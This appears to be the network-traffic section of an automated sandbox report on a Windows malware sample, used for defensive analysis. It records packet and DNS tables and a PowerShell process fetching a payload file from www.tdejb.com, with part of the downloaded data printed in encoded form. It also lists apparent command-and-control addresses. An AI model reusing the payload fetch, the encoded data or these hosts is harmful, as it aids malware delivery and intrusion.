                                                                                                                                      Dec 18, 2024 19:28:47.273698092 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.273741007 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.275284052 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.275407076 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.275492907 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.277023077 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.277147055 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.277348995 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.278739929 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.278801918 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.278856039 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.280492067 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.280644894 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.280700922 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.282215118 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.282341003 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.282404900 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.283925056 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.284023046 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.284178972 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.285665035 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.285762072 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.285847902 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.287422895 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.287509918 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.287566900 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.289268017 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.289315939 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.289402008 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.291014910 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.291096926 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.291141987 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.292646885 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.292756081 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.292824030 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.395579100 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.395626068 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.395693064 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.396248102 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.396367073 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.396409035 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.397809982 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.397923946 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.397979021 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.399761915 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.418401957 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.418468952 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.418520927 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.418998957 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.419162035 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.419173002 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.420412064 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.420424938 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.420475960 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.421761036 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.421802044 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.422091961 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.422240973 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.422302961 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.423485041 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.423640966 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.423827887 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.424856901 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.424868107 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.424918890 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.425149918 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.425162077 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.425203085 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.561043024 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.682621956 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.682688951 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.804547071 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:48.102901936 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:48.103018045 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:48.103046894 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:48.103373051 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:48.103425980 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:48.103879929 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:48.103929043 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:48.222702980 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:48.222754955 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:56.257448912 CET49975443192.168.2.645.149.241.141
                                                                                                                                      Dec 18, 2024 19:28:56.299362898 CET4434997545.149.241.141192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:57.273339033 CET50001443192.168.2.645.149.241.141
                                                                                                                                      Dec 18, 2024 19:28:57.273374081 CET4435000145.149.241.141192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:57.273444891 CET50001443192.168.2.645.149.241.141
                                                                                                                                      Dec 18, 2024 19:28:57.273556948 CET50001443192.168.2.645.149.241.141
                                                                                                                                      Dec 18, 2024 19:28:57.273566961 CET4435000145.149.241.141192.168.2.6
                                                                                                                                      Dec 18, 2024 19:29:07.273015022 CET50001443192.168.2.645.149.241.141
                                                                                                                                      Dec 18, 2024 19:29:07.315320969 CET4435000145.149.241.141192.168.2.6
                                                                                                                                      Dec 18, 2024 19:29:08.273314953 CET50028443192.168.2.645.149.241.141
                                                                                                                                      Dec 18, 2024 19:29:08.273353100 CET4435002845.149.241.141192.168.2.6
                                                                                                                                      Dec 18, 2024 19:29:08.273623943 CET50028443192.168.2.645.149.241.141
                                                                                                                                      Dec 18, 2024 19:29:08.273715973 CET50028443192.168.2.645.149.241.141
                                                                                                                                      Dec 18, 2024 19:29:08.273725986 CET4435002845.149.241.141192.168.2.6
                                                                                                                                      Dec 18, 2024 19:29:08.725431919 CET4434997545.149.241.141192.168.2.6
                                                                                                                                      Dec 18, 2024 19:29:08.725545883 CET49975443192.168.2.645.149.241.141

                                                                                                                                      UDP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Dec 18, 2024 19:27:10.891216993 CET6422853192.168.2.61.1.1.1
                                                                                                                                      Dec 18, 2024 19:27:11.545295954 CET53642281.1.1.1192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:15.094750881 CET6448453192.168.2.61.1.1.1
                                                                                                                                      Dec 18, 2024 19:28:15.096415997 CET6286953192.168.2.61.1.1.1
                                                                                                                                      Dec 18, 2024 19:28:15.100622892 CET5566853192.168.2.61.1.1.1
                                                                                                                                      Dec 18, 2024 19:28:15.102077961 CET6168553192.168.2.61.1.1.1
                                                                                                                                      Dec 18, 2024 19:28:15.103343010 CET5561153192.168.2.61.1.1.1
                                                                                                                                      Dec 18, 2024 19:28:15.104286909 CET6427153192.168.2.61.1.1.1
                                                                                                                                      Dec 18, 2024 19:28:15.105807066 CET6187553192.168.2.61.1.1.1
                                                                                                                                      Dec 18, 2024 19:28:15.235651970 CET53628691.1.1.1192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:15.238832951 CET53556681.1.1.1192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:15.239346027 CET53616851.1.1.1192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:15.242846012 CET53618751.1.1.1192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:15.243196011 CET53556111.1.1.1192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:15.914649010 CET53644841.1.1.1192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:15.917907953 CET61876123192.168.2.6162.159.200.1
                                                                                                                                      Dec 18, 2024 19:28:15.917999983 CET61876123192.168.2.6193.171.23.163
                                                                                                                                      Dec 18, 2024 19:28:15.918076038 CET61876123192.168.2.6213.239.239.164
                                                                                                                                      Dec 18, 2024 19:28:15.918121099 CET61876123192.168.2.6129.134.29.123
                                                                                                                                      Dec 18, 2024 19:28:15.918267012 CET61876123192.168.2.6129.6.15.28
                                                                                                                                      Dec 18, 2024 19:28:15.918293953 CET61876123192.168.2.662.149.0.30
                                                                                                                                      Dec 18, 2024 19:28:17.017215967 CET12361876162.159.200.1192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:17.024213076 CET12361876129.6.15.28192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:17.112554073 CET12361876213.239.239.164192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:17.114157915 CET12361876193.171.23.163192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:17.122920036 CET1236187662.149.0.30192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:17.245846033 CET12361876129.134.29.123192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:23.081120968 CET53599691.1.1.1192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:23.202151060 CET53572401.1.1.1192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:29.762327909 CET5662253192.168.2.61.1.1.1
                                                                                                                                      Dec 18, 2024 19:28:29.762794018 CET4954853192.168.2.61.1.1.1
                                                                                                                                      Dec 18, 2024 19:28:29.763156891 CET6378853192.168.2.61.1.1.1
                                                                                                                                      Dec 18, 2024 19:28:29.763437986 CET5936853192.168.2.61.1.1.1
                                                                                                                                      Dec 18, 2024 19:28:29.899761915 CET53566221.1.1.1192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:29.900048018 CET53495481.1.1.1192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:29.900363922 CET53637881.1.1.1192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:29.900621891 CET53593681.1.1.1192.168.2.6

                                                                                                                                      ICMP Packets

                                                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                                                      Dec 18, 2024 19:28:26.229291916 CET192.168.2.61.1.1.1c2a8(Port unreachable)Destination Unreachable

                                                                                                                                      DNS Queries

                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Dec 18, 2024 19:27:10.891216993 CET192.168.2.61.1.1.10x9038Standard query (0)www.tdejb.comA (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:15.094750881 CET192.168.2.61.1.1.10x3e7eStandard query (0)ntp.time.in.uaA (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:15.096415997 CET192.168.2.61.1.1.10xbce6Standard query (0)time-a-g.nist.govA (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:15.100622892 CET192.168.2.61.1.1.10x75acStandard query (0)time.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:15.102077961 CET192.168.2.61.1.1.10x6459Standard query (0)ntp1.hetzner.deA (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:15.103343010 CET192.168.2.61.1.1.10x1be2Standard query (0)ts1.aco.netA (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:15.104286909 CET192.168.2.61.1.1.10x8574Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:15.105807066 CET192.168.2.61.1.1.10x3803Standard query (0)time.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:29.762327909 CET192.168.2.61.1.1.10xb32dStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:29.762794018 CET192.168.2.61.1.1.10x88f4Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:29.763156891 CET192.168.2.61.1.1.10x16aaStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:29.763437986 CET192.168.2.61.1.1.10x8e3dStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                      DNS Answers

                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Dec 18, 2024 19:27:00.662465096 CET1.1.1.1192.168.2.60xb680No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:27:00.662465096 CET1.1.1.1192.168.2.60xb680No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:27:11.545295954 CET1.1.1.1192.168.2.60x9038No error (0)www.tdejb.comtdejb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:27:11.545295954 CET1.1.1.1192.168.2.60x9038No error (0)tdejb.com202.71.109.228A (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:15.235651970 CET1.1.1.1192.168.2.60xbce6No error (0)time-a-g.nist.gov129.6.15.28A (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:15.238832951 CET1.1.1.1192.168.2.60x75acNo error (0)time.facebook.com129.134.29.123A (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:15.239346027 CET1.1.1.1192.168.2.60x6459No error (0)ntp1.hetzner.de213.239.239.164A (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:15.242846012 CET1.1.1.1192.168.2.60x3803No error (0)time.cloudflare.com162.159.200.1A (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:15.242846012 CET1.1.1.1192.168.2.60x3803No error (0)time.cloudflare.com162.159.200.123A (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:15.243196011 CET1.1.1.1192.168.2.60x1be2No error (0)ts1.aco.net193.171.23.163A (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:15.243390083 CET1.1.1.1192.168.2.60x8574No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:15.914649010 CET1.1.1.1192.168.2.60x3e7eNo error (0)ntp.time.in.ua62.149.0.30A (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:29.899761915 CET1.1.1.1192.168.2.60xb32dNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:29.899761915 CET1.1.1.1192.168.2.60xb32dNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:29.900048018 CET1.1.1.1192.168.2.60x88f4No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:29.900363922 CET1.1.1.1192.168.2.60x16aaNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:29.900363922 CET1.1.1.1192.168.2.60x16aaNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                      Dec 18, 2024 19:28:29.900621891 CET1.1.1.1192.168.2.60x8e3dNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • www.tdejb.com

                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.649720202.71.109.228443524C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 18:27:13 UTC173OUTGET /ef/Skifterne.sea HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                      Host: www.tdejb.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2024-12-18 18:27:14 UTC183INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 18 Dec 2024 18:27:12 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Last-Modified: Wed, 18 Dec 2024 05:46:30 GMT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Content-Length: 460840
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-18 18:27:14 UTC8009INData Raw: 36 77 4b 5a 4f 75 73 43 73 54 71 37 34 37 55 58 41 4f 73 43 52 76 6c 78 41 5a 73 44 58 43 51 45 63 51 47 62 36 77 4b 41 4d 4c 6e 68 6e 45 72 44 63 51 47 62 36 77 4a 6e 50 59 48 70 46 66 43 58 71 33 45 42 6d 2b 73 43 74 54 79 42 77 54 52 54 54 65 6a 72 41 6f 30 72 36 77 49 7a 55 75 73 43 37 79 74 78 41 5a 75 36 45 44 4c 42 49 75 73 43 5a 67 76 72 41 73 6e 59 63 51 47 62 36 77 49 77 34 44 48 4b 36 77 49 49 6c 58 45 42 6d 34 6b 55 43 33 45 42 6d 33 45 42 6d 39 48 69 63 51 47 62 36 77 4b 36 4e 49 50 42 42 48 45 42 6d 33 45 42 6d 34 48 35 33 54 79 47 42 48 7a 4e 63 51 47 62 63 51 47 62 69 30 51 6b 42 48 45 42 6d 33 45 42 6d 34 6e 44 63 51 47 62 36 77 49 52 32 59 48 44 62 76 31 51 41 33 45 42 6d 33 45 42 6d 37 71 73 30 65 6d 6a 36 77 4b 36 70 48 45 42 6d 34 48
                                                                                                                                      Data Ascii: 6wKZOusCsTq747UXAOsCRvlxAZsDXCQEcQGb6wKAMLnhnErDcQGb6wJnPYHpFfCXq3EBm+sCtTyBwTRTTejrAo0r6wIzUusC7ytxAZu6EDLBIusCZgvrAsnYcQGb6wIw4DHK6wIIlXEBm4kUC3EBm3EBm9HicQGb6wK6NIPBBHEBm3EBm4H53TyGBHzNcQGbcQGbi0QkBHEBm3EBm4nDcQGb6wIR2YHDbv1QA3EBm3EBm7qs0emj6wK6pHEBm4H
                                                                                                                                      2024-12-18 18:27:14 UTC8000INData Raw: 43 71 57 56 71 4f 76 72 48 6b 58 46 63 56 52 7a 54 49 44 46 48 42 46 39 78 34 4e 4f 65 41 52 32 35 7a 76 6c 56 55 42 4e 63 77 34 48 46 64 54 38 47 68 57 4d 65 4d 76 63 68 54 38 66 33 61 68 70 37 67 65 36 49 54 43 71 78 54 38 64 2b 6c 46 33 62 67 65 52 50 51 77 54 4d 4b 52 73 41 69 55 41 71 52 71 52 33 67 59 64 62 74 61 71 6b 70 36 79 45 31 38 48 4c 36 6e 2f 43 7a 74 44 6d 50 33 58 54 30 43 52 74 6b 75 6c 69 62 6d 36 30 31 71 2f 6d 76 63 35 4b 4a 55 61 70 70 36 6b 6c 49 41 34 4c 77 75 79 76 72 34 30 61 36 35 4b 4c 62 45 74 49 71 59 2b 56 79 34 48 75 77 71 38 4e 55 55 7a 41 39 66 7a 35 6c 72 63 78 7a 76 4f 4f 55 49 61 37 77 70 34 69 33 4d 33 59 6e 66 73 79 39 7a 36 65 75 34 7a 4a 6d 50 64 35 63 2f 66 34 33 74 73 4e 2b 6e 4e 6b 6d 30 71 50 73 46 6a 6a 4b 44
                                                                                                                                      Data Ascii: CqWVqOvrHkXFcVRzTIDFHBF9x4NOeAR25zvlVUBNcw4HFdT8GhWMeMvchT8f3ahp7ge6ITCqxT8d+lF3bgeRPQwTMKRsAiUAqRqR3gYdbtaqkp6yE18HL6n/CztDmP3XT0CRtkulibm601q/mvc5KJUapp6klIA4Lwuyvr40a65KLbEtIqY+Vy4Huwq8NUUzA9fz5lrcxzvOOUIa7wp4i3M3Ynfsy9z6eu4zJmPd5c/f43tsN+nNkm0qPsFjjKD
                                                                                                                                      2024-12-18 18:27:14 UTC8000INData Raw: 47 4d 43 64 76 38 33 35 61 72 54 4d 42 30 41 43 65 76 69 48 6c 56 70 56 33 43 51 36 74 71 67 34 52 79 76 38 51 68 68 37 76 59 64 46 4f 73 58 4c 6a 58 43 48 5a 37 72 75 68 77 31 42 34 69 2f 2b 62 46 70 50 47 46 71 4a 4b 37 50 34 74 74 6a 56 6e 6d 32 69 58 56 68 42 36 66 32 78 68 41 65 51 52 33 6e 48 67 77 32 4b 4b 73 47 4f 65 2b 56 44 54 6e 76 6c 51 30 35 37 35 55 4e 4f 65 2b 56 63 44 41 6c 72 32 31 69 72 73 34 49 59 42 59 4c 32 63 31 49 50 2b 70 4e 67 30 79 35 6c 66 38 68 46 31 7a 52 48 6b 50 75 6b 64 57 45 4f 46 65 38 50 62 53 46 78 62 55 51 4f 6c 34 4e 44 50 2b 31 34 48 76 61 4f 5a 6a 52 6d 61 44 37 70 69 47 68 68 43 6d 6c 4c 44 6f 50 59 63 44 43 41 79 66 75 69 76 35 43 48 7a 6d 31 49 4d 58 4e 66 6b 75 71 4c 35 49 4c 36 51 35 34 38 38 30 34 55 39 35 32
                                                                                                                                      Data Ascii: GMCdv835arTMB0ACeviHlVpV3CQ6tqg4Ryv8Qhh7vYdFOsXLjXCHZ7ruhw1B4i/+bFpPGFqJK7P4ttjVnm2iXVhB6f2xhAeQR3nHgw2KKsGOe+VDTnvlQ0575UNOe+VcDAlr21irs4IYBYL2c1IP+pNg0y5lf8hF1zRHkPukdWEOFe8PbSFxbUQOl4NDP+14HvaOZjRmaD7piGhhCmlLDoPYcDCAyfuiv5CHzm1IMXNfkuqL5IL6Q548804U952
                                                                                                                                      2024-12-18 18:27:14 UTC8000INData Raw: 41 78 43 66 79 42 5a 6d 31 4c 65 49 62 62 66 49 47 4a 75 59 67 4d 78 71 2b 31 63 67 48 6a 6d 31 78 6c 75 5a 45 68 42 43 63 57 4d 79 4d 63 32 4d 55 6c 6d 6e 44 65 39 5a 67 50 47 2f 78 50 4e 32 39 61 67 39 4d 5a 50 72 65 43 47 57 76 55 4e 64 51 34 64 55 45 41 63 75 30 79 73 45 58 35 74 30 44 58 41 77 55 51 67 49 72 7a 76 61 62 59 55 2b 74 52 6d 79 55 36 34 4b 43 47 7a 45 79 33 43 57 34 64 72 78 62 42 30 62 6d 4d 45 4a 6e 50 65 6a 4d 38 49 51 78 2f 45 62 6d 50 45 30 5a 73 44 6a 4d 39 45 52 6b 70 55 5a 71 4d 34 42 64 64 59 61 66 67 48 4e 58 4d 66 34 54 7a 58 31 59 6d 39 35 45 59 70 42 32 77 35 5a 59 79 63 36 62 36 61 61 4a 7a 35 56 42 69 6f 6a 33 67 78 66 32 65 6a 56 69 73 43 30 7a 79 6c 73 52 36 77 48 65 32 56 44 62 4b 71 74 51 67 35 37 35 51 4e 73 48 4a 43
                                                                                                                                      Data Ascii: AxCfyBZm1LeIbbfIGJuYgMxq+1cgHjm1xluZEhBCcWMyMc2MUlmnDe9ZgPG/xPN29ag9MZPreCGWvUNdQ4dUEAcu0ysEX5t0DXAwUQgIrzvabYU+tRmyU64KCGzEy3CW4drxbB0bmMEJnPejM8IQx/EbmPE0ZsDjM9ERkpUZqM4BddYafgHNXMf4TzX1Ym95EYpB2w5ZYyc6b6aaJz5VBioj3gxf2ejVisC0zylsR6wHe2VDbKqtQg575QNsHJC
                                                                                                                                      2024-12-18 18:27:14 UTC8000INData Raw: 4c 34 59 65 6f 64 4e 76 63 67 2f 55 73 48 55 70 76 61 36 78 33 2b 30 4c 68 4f 6e 6b 64 36 76 59 32 4a 75 6b 75 31 5a 66 32 4a 61 68 6d 4b 73 4a 7a 4a 75 59 74 51 52 39 73 65 4d 2f 71 78 50 66 63 52 75 65 70 72 54 54 4d 4e 63 70 57 5a 30 42 41 42 79 38 7a 54 69 6b 70 38 4a 63 49 44 4a 79 46 35 55 66 54 41 74 44 39 35 61 62 70 49 57 64 57 70 52 77 41 66 41 33 4e 45 52 63 49 6b 51 78 57 42 71 58 46 4b 34 32 42 53 55 7a 70 2f 46 74 5a 49 45 6d 59 4d 38 47 57 78 30 4d 4e 6f 43 37 35 2b 62 6f 4f 79 4f 6b 39 49 49 45 4c 38 32 56 6d 39 7a 48 4f 73 34 36 51 69 49 34 70 65 33 6b 57 34 50 6e 61 43 56 61 51 73 4d 79 4e 65 74 43 76 33 68 6f 49 35 66 61 52 6e 53 57 50 42 5a 37 66 6c 37 74 79 61 32 68 64 5a 52 54 63 70 49 37 32 38 4b 72 63 5a 6e 31 32 42 56 75 4e 69 36
                                                                                                                                      Data Ascii: L4YeodNvcg/UsHUpva6x3+0LhOnkd6vY2Juku1Zf2JahmKsJzJuYtQR9seM/qxPfcRueprTTMNcpWZ0BABy8zTikp8JcIDJyF5UfTAtD95abpIWdWpRwAfA3NERcIkQxWBqXFK42BSUzp/FtZIEmYM8GWx0MNoC75+boOyOk9IIEL82Vm9zHOs46QiI4pe3kW4PnaCVaQsMyNetCv3hoI5faRnSWPBZ7fl7tya2hdZRTcpI728KrcZn12BVuNi6
                                                                                                                                      2024-12-18 18:27:14 UTC8000INData Raw: 7a 35 64 47 63 6a 4f 73 4b 7a 42 78 6a 41 79 30 2b 67 48 50 42 6c 41 43 4a 2b 2b 5a 6a 44 62 78 62 67 63 54 4f 6b 44 76 6c 6c 37 47 51 4a 6f 58 2f 64 2f 54 56 4d 46 41 46 77 34 51 33 61 6b 51 49 65 4a 31 59 59 59 63 37 56 46 39 35 68 4a 53 48 32 39 6b 38 42 61 78 6a 45 57 38 43 57 4a 41 6a 67 63 42 67 30 35 37 35 55 4e 4f 65 2b 56 44 54 6e 76 6c 51 30 35 37 2f 56 33 4c 37 59 32 69 69 45 35 68 46 41 6e 70 43 74 52 6e 76 4d 30 2f 77 61 6f 6d 66 63 32 74 6b 74 6a 35 50 37 47 68 71 51 79 6c 41 30 35 34 4a 51 2f 76 65 2b 56 44 54 6e 76 6c 51 30 35 37 35 55 4e 4f 65 2b 56 44 55 4b 32 71 78 35 4d 6d 2b 55 56 4b 53 6e 79 36 65 66 73 71 45 4f 41 46 62 41 36 6e 53 37 74 32 36 54 6d 6e 6c 63 74 68 64 79 41 74 72 30 76 44 58 44 50 64 49 7a 4c 69 4e 6e 56 6b 57 35 6e
